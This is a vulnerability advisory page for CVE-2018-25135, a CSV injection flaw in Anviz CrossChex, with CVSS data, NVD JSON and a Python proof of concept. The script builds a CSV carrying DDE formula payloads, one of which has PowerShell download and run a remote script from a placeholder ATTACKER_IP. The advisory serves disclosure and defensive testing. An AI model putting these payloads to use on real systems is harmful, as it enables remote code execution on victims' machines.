Security Vulnerability Report
CVE-2018-25135 CVSS 9.8 CRITICAL

CVE-2018-25135

Published: 2025-12-24 20:15:47
Last Modified: 2026-04-15 00:35:42

Description

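Anviz AIM CrossChex Standard 4.3.6.0 contains a CSV injection vulnerability that allows attackers to execute commands by inserting malicious formulas in user import fields. Attackers can craft payloads in fields like 'Name', 'Gender', or 'Position' to trigger Excel macro execution when importing user data. Per the output message of the PoC below, the formulas are evaluated once the imported data is opened in Excel, so execution happens in the spreadsheet application; that is the point where neutralising leading formula characters and restricting DDE take effect.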

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Anviz AIM CrossChex Standard 4.3.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import csv
import sys


def generate_malicious_csv(filename):
    """Write the CVE-2018-25135 sample user-import CSV to *filename*.

    The file has one header row, three rows whose 'Name' cell is a
    spreadsheet formula, and two ordinary rows. It is a test fixture for
    checking whether an import/export path neutralises formula cells.

    Reviewer note: every formula cell here begins with '='. A pipeline that
    escapes a leading '=', '+', '-' or '@' before the value reaches a
    spreadsheet (for example by prefixing a single quote) leaves these rows
    inert, and the same leading-character test can be used to flag suspect
    import files.

    Args:
        filename: Path of the CSV file to create (overwritten if present).

    Returns:
        The *filename* argument, unchanged.
    """
    # DDE-style formula; the sample command only starts the calculator.
    dde_cell = "=cmd|' /C calc'!A0"

    # DDE-style formula that fetches and runs a remote script.
    # ATTACKER_IP is a literal placeholder in this fixture, not a real host.
    remote_script_cell = "=cmd|' /C powershell -c \"IEX(New-Object Net.WebClient).downloadstring('http://ATTACKER_IP/rev.ps1')\"'!A0"

    # DDE-style formula that writes a marker file to disk.
    marker_file_cell = "=cmd|' /C echo malicious > C:\\temp\\pwned.txt'!A0"

    # Only the 'Name' column carries a formula in this fixture; the advisory
    # text also lists 'Gender' and 'Position' as affected fields.
    records = [
        ['Name', 'Gender', 'Position', 'Department', 'CardNumber'],
        [dde_cell, 'Male', 'IT Admin', 'Technology', '123456'],
        [remote_script_cell, 'Female', 'Manager', 'HR', '234567'],
        [marker_file_cell, 'Male', 'Developer', 'Engineering', '345678'],
        # Benign rows, so the file resembles a normal user export.
        ['John Smith', 'Male', 'Security', 'Security', '456789'],
        ['Jane Doe', 'Female', 'Analyst', 'Finance', '567890'],
    ]

    # newline='' lets the csv module control line endings itself.
    with open(filename, 'w', newline='', encoding='utf-8') as out:
        csv.writer(out).writerows(records)

    print(f"[+] Malicious CSV file created: {filename}")
    print(f"[!] When imported into CrossChex and opened in Excel, the formulas will be executed")
    return filename


if __name__ == '__main__':
    # Optional first CLI argument overrides the default output name.
    cli_args = sys.argv[1:]
    filename = cli_args[0] if cli_args else 'malicious_users.csv'
    generate_malicious_csv(filename)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25135", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:47.353", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Anviz AIM CrossChex Standard 4.3.6.0 contains a CSV injection vulnerability that allows attackers to execute commands by inserting malicious formulas in user import fields. Attackers can craft payloads in fields like 'Name', 'Gender', or 'Position' to trigger Excel macro execution when importing user data."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-149"}]}], "references": [{"url": "https://www.anviz.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45765", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5498.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45765", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5498.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}